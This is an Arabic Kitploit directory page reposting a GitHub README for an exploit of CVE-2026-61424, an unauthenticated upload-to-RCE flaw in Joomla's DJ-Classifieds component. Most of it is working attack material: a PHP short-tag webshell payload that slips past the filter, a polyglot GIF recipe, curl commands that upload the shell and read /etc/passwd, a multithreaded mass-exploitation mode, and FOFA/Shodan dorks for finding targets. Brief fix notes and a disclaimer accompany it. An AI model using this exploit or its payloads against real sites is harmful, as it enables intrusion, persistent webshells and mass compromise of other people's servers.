Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-61424 — مكوّن DJ-Classifieds في جوملا: ثغرة RCE عبر رفع ملفات بدون مصادقة. تجاوز فلتر بثلاث سلاسل عبر وسوم PHP القصيرة. CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2 | Kitploit
أدوات/GitHubGitHub/shinthink/cve-2026-61424
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقسوء التكوينالفريق الأحمرأداة الوصول عن بعد
GitHubshinthink/cve-2026-61424

CVE-2026-61424

مكوّن DJ-Classifieds في جوملا: ثغرة RCE عبر رفع ملفات بدون مصادقة. تجاوز فلتر بثلاث سلاسل عبر وسوم PHP القصيرة. CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2

عرض المستودع
منذ 21 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Python CVE CVSS License

CVE-2026-61424 — DJ-Classifieds <= 3.11.1

مهمة imageupload ← بدون مصادقة ← تجاوز فلتر السلاسل الثلاث (

نظرة عامة

رفع ملفات تعسفي دون مصادقة في DJ-Classifieds لجوملا. يعالج نقطة نهاية مهمة imageupload عمليات رفع الملفات بدون مصادقة ويعتمد على قائمة حظر من 3 سلاسل (<?php, eval(, base64) يمكن تجاوزها بسهولة باستخدام وسوم الفتح القصيرة في PHP (<?=). وبدمج ذلك مع GIF متعدد الصيغ، يجتاز الملف المرفوع جميع فحوصات التحقق من الصور مع احتوائه على قشرة ويب PHP كاملة الوظائف.


الإصدارات المتأثرة

الحالةالإصدار
معرض للخطر1.0 — 3.11.1
تم إصلاحه3.11.2 (20 يوليو 2026)

آلية الثغرة

السبب الجذري

ترتبط طريقة upload() في administrator/components/com_djclassifieds/lib/djupload.php بمهمة imageupload بدون أي فحص للمصادقة وبدون التحقق من رمز CSRF.

root@kitploit:~
// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method

// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check

$name     = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');

// ... writes file to tmp/djupload/<name>

لماذا يفشل فلتر الأمان (تجاوز السلاسل الثلاث)

لا يحظر ماسح المحتوى سوى ثلاث سلاسل حرفية فقط:

root@kitploit:~
// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
    die('Malicious file detected');
}

هذا يحظر <?php وeval( وbase64 — ولكنه لا يحظر وسوم فتح PHP القصيرة:

root@kitploit:~
<?=system($_GET['c']);?>     ← 0/3 blocked strings → PASSES

وسوم الصدى القصيرة في PHP (<?=) مفعّلة افتراضيًا منذ PHP 5.4.

تسلسل الهجوم

  1. أنشئ ملفًا متعدد الصيغ: ترويسة GIF89a صالحة + <?=system($_GET['c']);?>
  2. أرسل طلب POST إلى index.php?option=com_djclassifieds&task=imageupload مع name=shell.gif
  3. يفحص الخادم: امتداد .gif ✓ getimagesize() ✓ لا يحتوي على <?php/eval(/base64 ✓
  4. يُحفظ الملف في tmp/djupload/<shell>.gif
  5. الوصول: https://target.com/tmp/djupload/shell.gif?c=id

ملفات المصدر المؤكدة

أدلة سجلات الخادم

لُوحظت فحوصات ماسح ضوئي مجهولة في البرية قبل الإفصاح:

root@kitploit:~
POST /index.php?option=com_djclassifieds&task=imageupload
  name=<random>.gif  filename=<random>.gif
  — no cookie, no session, no referer

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt

الاستخدام

هدف واحد

root@kitploit:~
python cve_2026_61424.py -t target.com

استغلال جماعي

root@kitploit:~
python cve_2026_61424.py -f targets.txt -o shells.txt

الوسائط


إثبات المفهوم

هدف واحد

root@kitploit:~
$ python cve_2026_61424.py -t target.com

  Host         : target.com
  DJ-Classifieds: YES v3.11.1
  Upload       : YES
  RCE          : YES
  Shell        : https://target.com/tmp/djupload/img_abc123.gif
  Output       : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
  Time         : 2.1s

الاستغلال اليدوي

root@kitploit:~
# Step 1 — Upload polyglot shell
curl -sk -X POST \
  "https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
  -H "Content-Type: image/gif" \
  --data-binary @polyglot.gif

# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"

# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"

FOFA / Shodan

root@kitploit:~
# DJ-Classifieds component
body="com_djclassifieds"

# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"

# Exposed djupload directory
body="Index of" && body="djupload"

# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"

الإصلاح (3.11.2)

  1. إضافة مصادقة جوملا — فحص الضيف عبر JFactory::getUser() قبل upload()
  2. إضافة التحقق من رمز CSRF — JSession::checkToken() على مهمة imageupload
  3. تقييد أنواع الملفات — قائمة سماح من الصور فقط على الخادم (jpg, jpeg, png, gif)
  4. تحسين فحص المحتوى — كشف إضافي لأنماط PHP يتجاوز قائمة الحظر المكونة من 3 سلاسل

التأثير

  • RCE كامل — تنفيذ أوامر تعسفية كمستخدم خادم الويب
  • وصول دائم — تبقى القشرة حتى تتم إزالتها يدويًا أو تنظيف الدليل
  • إساءة استخدام المحتوى — رفع واستضافة ملفات تعسفية على نطاق موثوق
  • استنزاف القرص — إمكانية رفع كميات كبيرة دون مصادقة
  • هجمات متسلسلة — يمكن تضمين الصورة متعددة الصيغ عبر LFI في مواضع أخرى بالموقع

إخلاء مسؤولية

هذه الأداة مخصصة للاختبارات الأمنية التعليمية والمصرح بها فقط. استخدمها فقط ضد الأنظمة التي تمتلكها أو التي لديك إذن صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار.


المراجع


ليست تابعة لـ DJ-Extensions أو mySites.guru.

تنزيل الأداة
الحقلالتفاصيل
CVECVE-2026-61424
المنتجDJ-Classifieds (إضافة جوملا من DJ-Extensions)
CVSS 4.010.0 (حرجة)
النوعCWE-434 — رفع ملفات غير مقيد
الاكتشافPhil Taylor / mySites.guru — 16 يوليو 2026
الاستغلالتم تأكيد الاستغلال في البرية قبل الإفصاح
الملفالدور
administrator/components/com_djclassifieds/lib/djupload.phpطريقة upload() — بدون مصادقة، فلتر من 3 سلاسل
components/com_djclassifieds/controller.phpيوجّه مهمة imageupload إلى upload()
administrator/components/com_djclassifieds/djclassifieds.xmlالكشف عن الإصدار عبر وسم <version>
العلامةالوصفالافتراضي
-t, --targetمضيف واحد مستهدف—
-f, --fileملف يحتوي على الأهداف (سطر لكل هدف، مع دعم تعليقات #)—
-o, --outputحفظ روابط RCE في ملف—
--threadsعدد سلاسل العمليات للوضع الجماعي30
--no-cleanupعدم حذف القشرة بعد RCEFalse
--debugمخرجات التصحيحFalse
الموردالرابط
مركز IONIX للتهديداتionix.io/threat-center/cve-2026-61424
اكتشاف mySites.gurumysites.guru/blog/dj-classifieds-unauthenticated-file-upload
الإصدار الأمني من DJ-Extensionsdj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release
سجل CVE.orgcve.org/CVERecord?id=CVE-2026-61424
INCIBE-CERTincibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424